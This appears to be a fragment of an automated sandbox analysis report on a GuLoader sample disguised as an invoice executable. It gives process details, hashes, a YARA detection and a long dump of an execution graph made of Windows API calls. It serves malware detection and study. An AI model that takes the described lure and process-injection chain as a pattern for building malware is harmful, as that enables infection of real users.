                                                                                                                                                                                                                        Connection: close



                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:12:51:26
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:741'961 bytes
                                                                                                                                                                                                                        MD5 hash:1595B77A26B3343C46FC12FC8CCDCE82
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.26333481443.00000000047A5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                        Start time:12:52:36
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:741'961 bytes
                                                                                                                                                                                                                        MD5 hash:1595B77A26B3343C46FC12FC8CCDCE82
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                        Start time:12:53:06
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe"
                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                        Start time:12:53:08
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                                                                                                                                                                                                        Imagebase:0x9b0000
                                                                                                                                                                                                                        File size:19'456 bytes
                                                                                                                                                                                                                        MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:12:53:20
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe"
                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:12:53:33
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff716af0000
                                                                                                                                                                                                                        File size:597'432 bytes
                                                                                                                                                                                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true


                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:19.8%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:13.5%
                                                                                                                                                                                                                          Signature Coverage:22.1%
                                                                                                                                                                                                                          Total number of Nodes:1567
                                                                                                                                                                                                                          Total number of Limit Nodes:50
5012 404da2 5006->5012 5007 405054 5009 405066 5007->5009 5010 40505e SendMessageW 5007->5010 5008->5001 5022 405078 ImageList_Destroy 5009->5022 5023 40507f 5009->5023 5028 40508f 5009->5028 5010->5009 5011 404f24 5016 404ba7 5 API calls 5011->5016 5017 404242 19 API calls 5012->5017 5013 40523c 5014 4042a9 8 API calls 5013->5014 5020 40524a 5014->5020 5015->5021 5034 404f35 5016->5034 5031 404db0 5017->5031 5018 405001 SendMessageW 5018->5013 5019 405016 SendMessageW 5018->5019 5025 405029 5019->5025 5021->5007 5021->5013 5021->5018 5022->5023 5026 405088 GlobalFree 5023->5026 5023->5028 5024 4051fe 5024->5013 5029 405210 ShowWindow GetDlgItem ShowWindow 5024->5029 5036 40503a SendMessageW 5025->5036 5026->5028 5027 404e85 GetWindowLongW SetWindowLongW 5030 404e9e 5027->5030 5028->5024 5042 404c27 4 API calls 5028->5042 5048 4050ca 5028->5048 5029->5013 5032 404ea4 ShowWindow 5030->5032 5033 404ebc 5030->5033 5031->5027 5035 404e00 SendMessageW 5031->5035 5037 404e7f 5031->5037 5040 404e3c SendMessageW 5031->5040 5041 404e4d SendMessageW 5031->5041 5053 404277 SendMessageW 5032->5053 5054 404277 SendMessageW 5033->5054 5034->5005 5035->5031 5036->5007 5037->5027 5037->5030 5040->5031 5041->5031 5042->5048 5043 404eb7 5043->5013 5044->5005 5044->5011 5044->5021 5045 4051d4 InvalidateRect 5045->5024 5046 4051ea 5045->5046 5055 404b62 5046->5055 5047 4050f8 SendMessageW 5049 40510e 5047->5049 5048->5047 5048->5049 5049->5045 5051 40516f 5049->5051 5052 405182 SendMessageW SendMessageW 5049->5052 5051->5052 5052->5049 5053->5043 5054->5044 5058 404a99 5055->5058 5057 404b77 5057->5024 5059 404ab2 5058->5059 5060 4061a0 18 API calls 5059->5060 5061 404b16 5060->5061 5062 4061a0 18 API calls 5061->5062 5063 404b21 5062->5063 5064 4061a0 18 API calls 5063->5064 5065 404b37 lstrlenW wsprintfW SetDlgItemTextW 5064->5065 5065->5057 5249 40155b 5250 4029f2 5249->5250 5253 4060c5 wsprintfW 5250->5253 5252 4029f7 5253->5252 5119 401ddc 5120 402ba2 18 API calls 5119->5120 5121 
401de2 5120->5121 5122 402ba2 18 API calls 5121->5122 5123 401deb 5122->5123 5124 401df2 ShowWindow 5123->5124 5125 401dfd EnableWindow 5123->5125 5126 402a4c 5124->5126 5125->5126 5254 4046dd 5255 404709 5254->5255 5256 40471a 5254->5256 5315 4058a7 GetDlgItemTextW 5255->5315 5258 404726 GetDlgItem 5256->5258 5264 404785 5256->5264 5261 40473a 5258->5261 5259 404869 5265 404a18 5259->5265 5317 4058a7 GetDlgItemTextW 5259->5317 5260 404714 5262 406412 5 API calls 5260->5262 5263 40474e SetWindowTextW 5261->5263 5267 405bdd 4 API calls 5261->5267 5262->5256 5268 404242 19 API calls 5263->5268 5264->5259 5264->5265 5269 4061a0 18 API calls 5264->5269 5271 4042a9 8 API calls 5265->5271 5273 404744 5267->5273 5274 40476a 5268->5274 5275 4047f9 SHBrowseForFolderW 5269->5275 5270 404899 5276 405c3a 18 API calls 5270->5276 5272 404a2c 5271->5272 5273->5263 5280 405b32 3 API calls 5273->5280 5277 404242 19 API calls 5274->5277 5275->5259 5278 404811 CoTaskMemFree 5275->5278 5279 40489f 5276->5279 5281 404778 5277->5281 5282 405b32 3 API calls 5278->5282 5318 40617e lstrcpynW 5279->5318 5280->5263 5316 404277 SendMessageW 5281->5316 5284 40481e 5282->5284 5287 404855 SetDlgItemTextW 5284->5287 5291 4061a0 18 API calls 5284->5291 5286 40477e 5289 406558 5 API calls 5286->5289 5287->5259 5288 4048b6 5290 406558 5 API calls 5288->5290 5289->5264 5297 4048bd 5290->5297 5292 40483d lstrcmpiW 5291->5292 5292->5287 5295 40484e lstrcatW 5292->5295 5293 4048fe 5319 40617e lstrcpynW 5293->5319 5295->5287 5296 404905 5298 405bdd 4 API calls 5296->5298 5297->5293 5301 405b7e 2 API calls 5297->5301 5303 404956 5297->5303 5299 40490b GetDiskFreeSpaceW 5298->5299 5302 40492f MulDiv 5299->5302 5299->5303 5301->5297 5302->5303 5304 4049c7 5303->5304 5306 404b62 21 API calls 5303->5306 5305 4049ea 5304->5305 5307 40140b 2 API calls 5304->5307 5320 404264 EnableWindow 5305->5320 5308 4049b4 5306->5308 5307->5305 5310 4049c9 SetDlgItemTextW 5308->5310 5311 4049b9 5308->5311 5310->5304 5313 
404a99 21 API calls 5311->5313 5312 404a06 5312->5265 5321 404672 5312->5321 5313->5304 5315->5260 5316->5286 5317->5270 5318->5288 5319->5296 5320->5312 5322 404680 5321->5322 5323 404685 SendMessageW 5321->5323 5322->5323 5323->5265 5324 4022df 5325 402bbf 18 API calls 5324->5325 5326 4022ee 5325->5326 5327 402bbf 18 API calls 5326->5327 5328 4022f7 5327->5328 5329 402bbf 18 API calls 5328->5329 5330 402301 GetPrivateProfileStringW 5329->5330 5331 4043df 5332 4043f7 5331->5332 5338 404511 5331->5338 5339 404242 19 API calls 5332->5339 5333 40457b 5334 404585 GetDlgItem 5333->5334 5335 40464d 5333->5335 5336 40460e 5334->5336 5337 40459f 5334->5337 5342 4042a9 8 API calls 5335->5342 5336->5335 5344 404620 5336->5344 5337->5336 5343 4045c5 6 API calls 5337->5343 5338->5333 5338->5335 5340 40454c GetDlgItem SendMessageW 5338->5340 5341 40445e 5339->5341 5362 404264 EnableWindow 5340->5362 5346 404242 19 API calls 5341->5346 5352 404648 5342->5352 5343->5336 5348 404636 5344->5348 5349 404626 SendMessageW 5344->5349 5347 40446b CheckDlgButton 5346->5347 5360 404264 EnableWindow 5347->5360 5348->5352 5353 40463c SendMessageW 5348->5353 5349->5348 5350 404576 5354 404672 SendMessageW 5350->5354 5353->5352 5354->5333 5355 404489 GetDlgItem 5361 404277 SendMessageW 5355->5361 5357 40449f SendMessageW 5358 4044c5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5357->5358 5359 4044bc GetSysColor 5357->5359 5358->5352 5359->5358 5360->5355 5361->5357 5362->5350 5363 401bdf 5364 402ba2 18 API calls 5363->5364 5365 401be6 5364->5365 5366 402ba2 18 API calls 5365->5366 5367 401bf0 5366->5367 5368 401c00 5367->5368 5369 402bbf 18 API calls 5367->5369 5370 401c10 5368->5370 5371 402bbf 18 API calls 5368->5371 5369->5368 5372 401c1b 5370->5372 5373 401c5f 5370->5373 5371->5370 5375 402ba2 18 API calls 5372->5375 5374 402bbf 18 API calls 5373->5374 5377 401c64 5374->5377 5376 401c20 5375->5376 5378 402ba2 18 API calls 5376->5378 5379 402bbf 18 API calls 5377->5379 
5380 401c29 5378->5380 5381 401c6d FindWindowExW 5379->5381 5382 401c31 SendMessageTimeoutW 5380->5382 5383 401c4f SendMessageW 5380->5383 5384 401c8f 5381->5384 5382->5384 5383->5384 5385 401960 5386 402ba2 18 API calls 5385->5386 5387 401967 5386->5387 5388 402ba2 18 API calls 5387->5388 5389 401971 5388->5389 5390 402bbf 18 API calls 5389->5390 5391 40197a 5390->5391 5392 40198e lstrlenW 5391->5392 5393 4019ca 5391->5393 5394 401998 5392->5394 5394->5393 5398 40617e lstrcpynW 5394->5398 5396 4019b3 5396->5393 5397 4019c0 lstrlenW 5396->5397 5397->5393 5398->5396 5399 401662 5400 402bbf 18 API calls 5399->5400 5401 401668 5400->5401 5402 4064c1 2 API calls 5401->5402 5403 40166e 5402->5403 5404 4019e4 5405 402bbf 18 API calls 5404->5405 5406 4019eb 5405->5406 5407 402bbf 18 API calls 5406->5407 5408 4019f4 5407->5408 5409 4019fb lstrcmpiW 5408->5409 5410 401a0d lstrcmpW 5408->5410 5411 401a01 5409->5411 5410->5411 4268 4025e5 4282 402ba2 4268->4282 4270 40272d 4271 40263a ReadFile 4271->4270 4279 4025f4 4271->4279 4272 4026d3 4272->4270 4272->4279 4285 405e34 SetFilePointer 4272->4285 4274 40267a MultiByteToWideChar 4274->4279 4275 40272f 4296 4060c5 wsprintfW 4275->4296 4278 4026a0 SetFilePointer MultiByteToWideChar 4278->4279 4279->4270 4279->4271 4279->4272 4279->4274 4279->4275 4279->4278 4281 402740 4279->4281 4294 405dd6 ReadFile 4279->4294 4280 402761 SetFilePointer 4280->4270 4281->4270 4281->4280 4283 4061a0 18 API calls 4282->4283 4284 402bb6 4283->4284 4284->4279 4286 405e50 4285->4286 4291 405e6c 4285->4291 4287 405dd6 ReadFile 4286->4287 4288 405e5c 4287->4288 4289 405e75 SetFilePointer 4288->4289 4290 405e9d SetFilePointer 4288->4290 4288->4291 4289->4290 4292 405e80 4289->4292 4290->4291 4291->4272 4297 405e05 WriteFile 4292->4297 4295 405df4 4294->4295 4295->4279 4296->4270 4298 405e23 4297->4298 4298->4291 5412 406ae5 5414 4066ca 5412->5414 5413 407035 5414->5413 5415 406754 GlobalAlloc 5414->5415 5416 40674b GlobalFree 5414->5416 5417 4067c2 
GlobalFree 5414->5417 5418 4067cb GlobalAlloc 5414->5418 5415->5413 5415->5414 5416->5415 5417->5418 5418->5413 5418->5414 4299 401e66 4300 402bbf 18 API calls 4299->4300 4301 401e6c 4300->4301 4302 4052dd 25 API calls 4301->4302 4303 401e76 4302->4303 4317 40585e CreateProcessW 4303->4317 4306 401edb CloseHandle 4309 40281e 4306->4309 4307 401e8c WaitForSingleObject 4308 401e9e 4307->4308 4310 401eb0 GetExitCodeProcess 4308->4310 4320 406594 4308->4320 4312 401ec2 4310->4312 4313 401ecf 4310->4313 4324 4060c5 wsprintfW 4312->4324 4313->4306 4314 401ecd 4313->4314 4314->4306 4318 405891 CloseHandle 4317->4318 4319 401e7c 4317->4319 4318->4319 4319->4306 4319->4307 4319->4309 4321 4065b1 PeekMessageW 4320->4321 4322 401ea5 WaitForSingleObject 4321->4322 4323 4065a7 DispatchMessageW 4321->4323 4322->4308 4323->4321 4324->4314 4334 401767 4335 402bbf 18 API calls 4334->4335 4336 40176e 4335->4336 4337 401796 4336->4337 4338 40178e 4336->4338 4392 40617e lstrcpynW 4337->4392 4391 40617e lstrcpynW 4338->4391 4341 401794 4345 406412 5 API calls 4341->4345 4342 4017a1 4393 405b32 lstrlenW CharPrevW 4342->4393 4349 4017b3 4345->4349 4350 4017c5 CompareFileTime 4349->4350 4351 401885 4349->4351 4354 40617e lstrcpynW 4349->4354 4360 4061a0 18 API calls 4349->4360 4369 40185c 4349->4369 4372 405d2e GetFileAttributesW 4349->4372 4375 405d53 GetFileAttributesW CreateFileW 4349->4375 4396 4064c1 FindFirstFileW 4349->4396 4399 4058c3 4349->4399 4350->4349 4352 4052dd 25 API calls 4351->4352 4355 40188f 4352->4355 4353 4052dd 25 API calls 4371 401871 4353->4371 4354->4349 4376 4030e7 4355->4376 4358 4018b6 SetFileTime 4359 4018c8 CloseHandle 4358->4359 4361 4018d9 4359->4361 4359->4371 4360->4349 4362 4018f1 4361->4362 4363 4018de 4361->4363 4365 4061a0 18 API calls 4362->4365 4364 4061a0 18 API calls 4363->4364 4367 4018e6 lstrcatW 4364->4367 4368 4018f9 4365->4368 4367->4368 4370 4058c3 MessageBoxIndirectW 4368->4370 4369->4353 4369->4371 4370->4371 4373 405d40 
SetFileAttributesW 4372->4373 4374 405d4d 4372->4374 4373->4374 4374->4349 4375->4349 4377 403112 4376->4377 4378 4030f6 SetFilePointer 4376->4378 4403 4031ef GetTickCount 4377->4403 4378->4377 4381 405dd6 ReadFile 4382 403132 4381->4382 4383 4031ef 43 API calls 4382->4383 4387 4018a2 4382->4387 4384 403149 4383->4384 4385 4031b5 ReadFile 4384->4385 4384->4387 4389 403158 4384->4389 4385->4387 4387->4358 4387->4359 4388 405dd6 ReadFile 4388->4389 4389->4387 4389->4388 4390 405e05 WriteFile 4389->4390 4390->4389 4391->4341 4392->4342 4394 4017a7 lstrcatW 4393->4394 4395 405b4e lstrcatW 4393->4395 4394->4341 4395->4394 4397 4064e2 4396->4397 4398 4064d7 FindClose 4396->4398 4397->4349 4398->4397 4401 4058d8 4399->4401 4400 405924 4400->4349 4401->4400 4402 4058ec MessageBoxIndirectW 4401->4402 4402->4400 4404 403347 4403->4404 4405 40321d 4403->4405 4406 402d9f 33 API calls 4404->4406 4416 40336e SetFilePointer 4405->4416 4412 403119 4406->4412 4408 403228 SetFilePointer 4414 40324d 4408->4414 4412->4381 4412->4387 4413 405e05 WriteFile 4413->4414 4414->4412 4414->4413 4415 403328 SetFilePointer 4414->4415 4417 403358 4414->4417 4420 406697 4414->4420 4427 402d9f 4414->4427 4415->4404 4416->4408 4418 405dd6 ReadFile 4417->4418 4419 40336b 4418->4419 4419->4414 4421 4066bc 4420->4421 4422 4066c4 4420->4422 4421->4414 4422->4421 4423 406754 GlobalAlloc 4422->4423 4424 40674b GlobalFree 4422->4424 4425 4067c2 GlobalFree 4422->4425 4426 4067cb GlobalAlloc 4422->4426 4423->4421 4423->4422 4424->4423 4425->4426 4426->4421 4426->4422 4428 402db0 4427->4428 4429 402dc8 4427->4429 4430 402dc0 4428->4430 4431 402db9 DestroyWindow 4428->4431 4432 402dd0 4429->4432 4433 402dd8 GetTickCount 4429->4433 4430->4414 4431->4430 4434 406594 2 API calls 4432->4434 4433->4430 4435 402de6 4433->4435 4434->4430 4436 402e1b CreateDialogParamW ShowWindow 4435->4436 4437 402dee 4435->4437 4436->4430 4437->4430 4442 402d83 4437->4442 4439 402dfc wsprintfW 4440 4052dd 25 API calls 4439->4440 
4441 402e19 4440->4441 4441->4430 4443 402d92 4442->4443 4444 402d94 MulDiv 4442->4444 4443->4444 4444->4439 5419 100018a9 5420 100018cc 5419->5420 5421 100018ff GlobalFree 5420->5421 5422 10001911 5420->5422 5421->5422 5423 10001272 2 API calls 5422->5423 5424 10001a87 GlobalFree GlobalFree 5423->5424 5425 401ee9 5426 402bbf 18 API calls 5425->5426 5427 401ef0 5426->5427 5428 4064c1 2 API calls 5427->5428 5429 401ef6 5428->5429 5431 401f07 5429->5431 5432 4060c5 wsprintfW 5429->5432 5432->5431 4448 403d6a 4449 403d82 4448->4449 4450 403ebd 4448->4450 4449->4450 4451 403d8e 4449->4451 4452 403ece GetDlgItem GetDlgItem 4450->4452 4461 403f0e 4450->4461 4453 403d99 SetWindowPos 4451->4453 4454 403dac 4451->4454 4455 404242 19 API calls 4452->4455 4453->4454 4458 403db1 ShowWindow 4454->4458 4459 403dc9 4454->4459 4460 403ef8 SetClassLongW 4455->4460 4456 403f68 4466 403eb8 4456->4466 4519 40428e 4456->4519 4458->4459 4462 403dd1 DestroyWindow 4459->4462 4463 403deb 4459->4463 4464 40140b 2 API calls 4460->4464 4461->4456 4465 401389 2 API calls 4461->4465 4467 4041ec 4462->4467 4468 403df0 SetWindowLongW 4463->4468 4469 403e01 4463->4469 4464->4461 4470 403f40 4465->4470 4467->4466 4477 4041fc ShowWindow 4467->4477 4468->4466 4473 403eaa 4469->4473 4474 403e0d GetDlgItem 4469->4474 4470->4456 4475 403f44 SendMessageW 4470->4475 4471 40140b 2 API calls 4493 403f7a 4471->4493 4472 4041cd DestroyWindow EndDialog 4472->4467 4538 4042a9 4473->4538 4478 403e20 SendMessageW IsWindowEnabled 4474->4478 4479 403e3d 4474->4479 4475->4466 4477->4466 4478->4466 4478->4479 4481 403e4a 4479->4481 4482 403e91 SendMessageW 4479->4482 4483 403e5d 4479->4483 4491 403e42 4479->4491 4480 4061a0 18 API calls 4480->4493 4481->4482 4481->4491 4482->4473 4486 403e65 4483->4486 4487 403e7a 4483->4487 4485 404242 19 API calls 4485->4493 4532 40140b 4486->4532 4490 40140b 2 API calls 4487->4490 4488 403e78 4488->4473 4492 403e81 4490->4492 4535 40421b 4491->4535 4492->4473 4492->4491 4493->4466 
4493->4471 4493->4472 4493->4480 4493->4485 4509 40410d DestroyWindow 4493->4509 4522 404242 4493->4522 4495 403ff5 GetDlgItem 4496 404012 ShowWindow KiUserCallbackDispatcher 4495->4496 4497 40400a 4495->4497 4525 404264 EnableWindow 4496->4525 4497->4496 4499 40403c EnableWindow 4502 404050 4499->4502 4500 404055 GetSystemMenu EnableMenuItem SendMessageW 4501 404085 SendMessageW 4500->4501 4500->4502 4501->4502 4502->4500 4526 404277 SendMessageW 4502->4526 4527 40617e lstrcpynW 4502->4527 4505 4040b3 lstrlenW 4506 4061a0 18 API calls 4505->4506 4507 4040c9 SetWindowTextW 4506->4507 4528 401389 4507->4528 4509->4467 4510 404127 CreateDialogParamW 4509->4510 4510->4467 4511 40415a 4510->4511 4512 404242 19 API calls 4511->4512 4513 404165 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4512->4513 4514 401389 2 API calls 4513->4514 4515 4041ab 4514->4515 4515->4466 4516 4041b3 ShowWindow 4515->4516 4517 40428e SendMessageW 4516->4517 4518 4041cb 4517->4518 4518->4467 4520 4042a6 4519->4520 4521 404297 SendMessageW 4519->4521 4520->4493 4521->4520 4523 4061a0 18 API calls 4522->4523 4524 40424d SetDlgItemTextW 4523->4524 4524->4495 4525->4499 4526->4502 4527->4505 4530 401390 4528->4530 4529 4013fe 4529->4493 4530->4529 4531 4013cb MulDiv SendMessageW 4530->4531 4531->4530 4533 401389 2 API calls 4532->4533 4534 401420 4533->4534 4534->4491 4536 404222 4535->4536 4537 404228 SendMessageW 4535->4537 4536->4537 4537->4488 4539 4042c1 GetWindowLongW 4538->4539 4549 40434a 4538->4549 4540 4042d2 4539->4540 4539->4549 4541 4042e1 GetSysColor 4540->4541 4542 4042e4 4540->4542 4541->4542 4543 4042f4 SetBkMode 4542->4543 4544 4042ea SetTextColor 4542->4544 4545 404312 4543->4545 4546 40430c GetSysColor 4543->4546 4544->4543 4547 404323 4545->4547 4548 404319 SetBkColor 4545->4548 4546->4545 4547->4549 4550 404336 DeleteObject 4547->4550 4551 40433d CreateBrushIndirect 4547->4551 4548->4547 4549->4466 4550->4551 4551->4549 5433 4021ea 5434 402bbf 18 API calls 5433->5434 
5435 4021f0 5434->5435 5436 402bbf 18 API calls 5435->5436 5437 4021f9 5436->5437 5438 402bbf 18 API calls 5437->5438 5439 402202 5438->5439 5440 4064c1 2 API calls 5439->5440 5441 40220b 5440->5441 5442 40221c lstrlenW lstrlenW 5441->5442 5446 40220f 5441->5446 5444 4052dd 25 API calls 5442->5444 5443 4052dd 25 API calls 5447 402217 5443->5447 5445 40225a SHFileOperationW 5444->5445 5445->5446 5445->5447 5446->5443 5446->5447 5448 40156b 5449 401584 5448->5449 5450 40157b ShowWindow 5448->5450 5451 401592 ShowWindow 5449->5451 5452 402a4c 5449->5452 5450->5449 5451->5452 5453 40226e 5454 402275 5453->5454 5458 402288 5453->5458 5455 4061a0 18 API calls 5454->5455 5456 402282 5455->5456 5457 4058c3 MessageBoxIndirectW 5456->5457 5457->5458 5459 4014f1 SetForegroundWindow 5460 402a4c 5459->5460 5461 401673 5462 402bbf 18 API calls 5461->5462 5463 40167a 5462->5463 5464 402bbf 18 API calls 5463->5464 5465 401683 5464->5465 5466 402bbf 18 API calls 5465->5466 5467 40168c MoveFileW 5466->5467 5468 40169f 5467->5468 5474 401698 5467->5474 5469 4021e1 5468->5469 5470 4064c1 2 API calls 5468->5470 5472 4016ae 5470->5472 5471 401423 25 API calls 5471->5469 5472->5469 5473 40601f 38 API calls 5472->5473 5473->5474 5474->5471 5475 100016b6 5476 100016e5 5475->5476 5477 10001b18 22 API calls 5476->5477 5478 100016ec 5477->5478 5479 100016f3 5478->5479 5480 100016ff 5478->5480 5481 10001272 2 API calls 5479->5481 5482 10001726 5480->5482 5483 10001709 5480->5483 5484 100016fd 5481->5484 5486 10001750 5482->5486 5487 1000172c 5482->5487 5485 1000153d 3 API calls 5483->5485 5489 1000170e 5485->5489 5488 1000153d 3 API calls 5486->5488 5490 100015b4 3 API calls 5487->5490 5488->5484 5492 100015b4 3 API calls 5489->5492 5491 10001731 5490->5491 5493 10001272 2 API calls 5491->5493 5494 10001714 5492->5494 5495 10001737 GlobalFree 5493->5495 5496 10001272 2 API calls 5494->5496 5495->5484 5497 1000174b GlobalFree 5495->5497 5498 1000171a GlobalFree 5496->5498 5497->5484 5498->5484 
5499 10002238 5500 10002296 5499->5500 5501 100022cc 5499->5501 5500->5501 5502 100022a8 GlobalAlloc 5500->5502 5502->5500 5503 401cfa GetDlgItem GetClientRect 5504 402bbf 18 API calls 5503->5504 5505 401d2c LoadImageW SendMessageW 5504->5505 5506 401d4a DeleteObject 5505->5506 5507 402a4c 5505->5507 5506->5507 5092 40237b 5093 402381 5092->5093 5094 402bbf 18 API calls 5093->5094 5095 402393 5094->5095 5096 402bbf 18 API calls 5095->5096 5097 40239d RegCreateKeyExW 5096->5097 5098 4023c7 5097->5098 5099 40281e 5097->5099 5100 4023e2 5098->5100 5101 402bbf 18 API calls 5098->5101 5102 4023ee 5100->5102 5104 402ba2 18 API calls 5100->5104 5103 4023d8 lstrlenW 5101->5103 5105 402409 RegSetValueExW 5102->5105 5106 4030e7 45 API calls 5102->5106 5103->5100 5104->5102 5107 40241f RegCloseKey 5105->5107 5106->5105 5107->5099 5109 4027fb 5110 402bbf 18 API calls 5109->5110 5111 402802 FindFirstFileW 5110->5111 5112 40282a 5111->5112 5115 402815 5111->5115 5113 402833 5112->5113 5117 4060c5 wsprintfW 5112->5117 5118 40617e lstrcpynW 5113->5118 5117->5113 5118->5115 5522 1000103d 5523 1000101b 5 API calls 5522->5523 5524 10001056 5523->5524 5525 4014ff 5526 401507 5525->5526 5528 40151a 5525->5528 5527 402ba2 18 API calls 5526->5527 5527->5528 5529 401000 5530 401037 BeginPaint GetClientRect 5529->5530 5531 40100c DefWindowProcW 5529->5531 5533 4010f3 5530->5533 5534 401179 5531->5534 5535 401073 CreateBrushIndirect FillRect DeleteObject 5533->5535 5536 4010fc 5533->5536 5535->5533 5537 401102 CreateFontIndirectW 5536->5537 5538 401167 EndPaint 5536->5538 5537->5538 5539 401112 6 API calls 5537->5539 5538->5534 5539->5538 5547 401904 5548 40193b 5547->5548 5549 402bbf 18 API calls 5548->5549 5550 401940 5549->5550 5551 40596f 69 API calls 5550->5551 5552 401949 5551->5552 5553 402d04 5554 402d16 SetTimer 5553->5554 5555 402d2f 5553->5555 5554->5555 5556 402d7d 5555->5556 5557 402d83 MulDiv 5555->5557 5558 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 5557->5558 5558->5556 
5560 403985 5561 403990 5560->5561 5562 403994 5561->5562 5563 403997 GlobalAlloc 5561->5563 5563->5562 4325 402786 4326 4029f7 4325->4326 4327 40278d 4325->4327 4328 402ba2 18 API calls 4327->4328 4329 402798 4328->4329 4330 40279f SetFilePointer 4329->4330 4330->4326 4331 4027af 4330->4331 4333 4060c5 wsprintfW 4331->4333 4333->4326 4445 100027c7 4446 10002817 4445->4446 4447 100027d7 VirtualProtect 4445->4447 4447->4446 5564 401907 5565 402bbf 18 API calls 5564->5565 5566 40190e 5565->5566 5567 4058c3 MessageBoxIndirectW 5566->5567 5568 401917 5567->5568 5569 401e08 5570 402bbf 18 API calls 5569->5570 5571 401e0e 5570->5571 5572 402bbf 18 API calls 5571->5572 5573 401e17 5572->5573 5574 402bbf 18 API calls 5573->5574 5575 401e20 5574->5575 5576 402bbf 18 API calls 5575->5576 5577 401e29 5576->5577 5578 401423 25 API calls 5577->5578 5579 401e30 ShellExecuteW 5578->5579 5580 401e61 5579->5580 5586 1000164f 5587 10001516 GlobalFree 5586->5587 5589 10001667 5587->5589 5588 100016ad GlobalFree 5589->5588 5590 10001682 5589->5590 5591 10001699 VirtualFree 5589->5591 5590->5588 5591->5588 5592 404390 lstrlenW 5593 4043b1 WideCharToMultiByte 5592->5593 5594 4043af 5592->5594 5594->5593 5595 401491 5596 4052dd 25 API calls 5595->5596 5597 401498 5596->5597 5605 401a15 5606 402bbf 18 API calls 5605->5606 5607 401a1e ExpandEnvironmentStringsW 5606->5607 5608 401a32 5607->5608 5610 401a45 5607->5610 5609 401a37 lstrcmpW 5608->5609 5608->5610 5609->5610 5611 402515 5612 